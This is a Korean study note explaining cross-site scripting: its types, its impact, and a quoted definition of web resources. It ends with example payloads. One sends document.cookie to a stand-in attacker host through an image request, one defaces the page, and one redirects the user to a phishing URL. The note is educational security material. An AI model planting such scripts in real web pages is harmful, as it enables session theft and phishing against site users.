XSS(Cross-Site-Scripting) 정리

• 클라이언트 사이드 취약점
• 공격자가 웹 리소스에 악성 스크립트를 삽입해 이용자의 웹 브라우저에서 해당 스크립트를 실행가능
• 해당 취약점을 통해 특정 계정의 세션 정보를 탈취하고 해당 계정으로 임의의 기능 수행
• 요즘 SOP 보안 정책 등장하면서 서로 다른 오리진에서는 정보를 읽는 행위가 힘들어짐 => 우회 기법 존재

---

💡웹 리소스 (출처 : ChatGPT)

 

웹 리소스(Web Resource)는 웹에서 사용되는 모든 종류의 자원이나 자료를 말합니다. 이는 텍스트, 그림, 동영상, 스타일 시트, 스크립트 파일, 데이터 파일 등과 같은 다양한 형태의 정보를 포함할 수 있습니다. 웹 리소스는 웹 페이지의 내용과 디자인을 형성하며, 웹 개발에서는 이러한 리소스들을 효과적으로 관리하여 웹 페이지의 성능을 향상시키는 것이 중요합니다.

 

웹 리소스의 종류

1. HTML : 웹 페이지의 구조를 정의하는 마크업 언어로, 텍스트, 이미지, 링크 등을 포함
2. CSS : 웹 페이지의 스타일과 레이아웃을 정의하는 스타일 시트 언어로, HTML 요소의 디자인
3. JavaScript: 웹 페이지의 동적인 부분을 담당하는 스크립트 언어로, 클라이언트 측에서 실행
4. 이미지 파일: 웹 페이지에 사용되는 그림이나 사진을 포함한 파일들로, JPEG, PNG, GIF 등의 형식 존재.
5. 동영상 파일: 웹 페이지에서 재생되는 동영상을 위한 파일로, 주로 MP4, WebM, Ogg 등의 형식이 사용
6. 폰트 파일: 특정 폰트를 웹 페이지에 적용하기 위한 파일로, 웹 폰트 포맷인 WOFF, WOFF2 등이 존재
7. 데이터 파일: 웹 애플리케이션에서 사용되는 데이터를 저장하거나 교환하기 위한 파일로, JSON, XML 등의 형식이 사용됨

 

웹 리소스는 웹 브라우저를 통해 다운로드되어 사용자에게 웹 페이지를 제공하며, 웹 개발자들은 이러한 리소스들을 최적화하고 효율적으로 관리하여 웹 페이지의 성능을 최적화하는 작업을 수행합니다.

---

 

• 이용자가 삽입한 내용을 출력하는 기능을 발생
• HTML, CSS, JS와 같은 코드가 포함된 게시물을 조회할 경우 이용자는 변조된 페이지를 보거나 스크립트가 실행됨
• <script> 태그를 삽입하여 공격 가능

 XSS 종류

1. Stored XSS 

  - XSS에 사용되는 악성 스크립트가 서버에 저장되고 서버의 응답에 담겨오는 XSS

  - 예시) 게시물과 댓글에 악성 스크립트를 포함하여 업로드 -> 불특정 다수에게 보여짐 -> 높은 파급력 존재

2. Reflected XSS 

  - XSS에 사용되는 악성 스크립트가 URL에 삽입되고 서버의 응답에 담겨오는 XSS

  - 예시) 게시판 서비스에서 작성된 게시물을 조회하기 위한 검색창에서 스크립트를 포함해 검색하는 방식

  - 공격을 위해서는 다른 이용자를 악성 스크립트가 포함된 링크에 접속하도록 유도해야함

  - 이용자에게 링크를 직접 전달하는 방법은 악성 스크립트 포함 여부를 이용자가 눈치챌 수 있기 때문에 Click Jacking 또      는 Open Redirect 등 다른 취약점과 연계하여 사용함

3. DOM-based XSS

  - XSS에 사용되는 악성 스크립트가 URL Fragment에 삽입되는 XSS (Fragment는 서버 요청 / 응답에 포함X)

4, Universal XSS

  - 클라이언트의 브라우저 혹은 브라우저의 플러그인에서 발생하는 취약점으로 SOP 정책을 우회하는 XSS

 

• 자바 스크립트 기본적인 기능(이벤트 구현) 외에도 이용자와의 상호작용없이 이용자의 권한으로 정보를 조회하거나 변경하는 등의 행위가 가능해짐 -> 이용자를 식별하기 위한 세션 및 쿠키가 웹 브라우저에 저장되어 있음 
• 공격자는 자바스크립트를 통해 이용자에게 보여지는 웹 페이지를 조작하거나, 웹 브라우저의 위치를 임의의 주소로 변경가능

 

쿠키 및 세션 탈취 공격 코드⏬

<script>
// "hello" 문자열 alert 실행.
alert("hello");
// 현재 페이지의 쿠키(return type: string)
document.cookie; 
// 현재 페이지의 쿠키를 인자로 가진 alert 실행.
alert(document.cookie);
// 쿠키 생성(key: name, value: test)
document.cookie = "name=test;";
// new Image() 는 이미지를 생성하는 함수이며, src는 이미지의 주소를 지정. 공격자 주소는 http://hacker.dreamhack.io
// "http://hacker.dreamhack.io/?cookie=현재페이지의쿠키" 주소를 요청하기 때문에 공격자 주소로 현재 페이지의 쿠키 요청함
new Image().src = "http://hacker.dreamhack.io/?cookie=" + document.cookie;
</script>

 

페이지 변조 공격 코드 ⏬

<script>
// 이용자의 페이지 정보에 접근.
document;
// 이용자의 페이지에 데이터를 삽입.
document.write("Hacked By DreamHack !");
</script>

 

위치 이동 공격 코드 ⏬

<script>
// 이용자의 위치를 변경.
// 피싱 공격 등으로 사용됨.
location.href = "http://hacker.dreamhack.io/phishing"; 
// 새 창 열기
window.open("http://hacker.dreamhack.io/")
</script>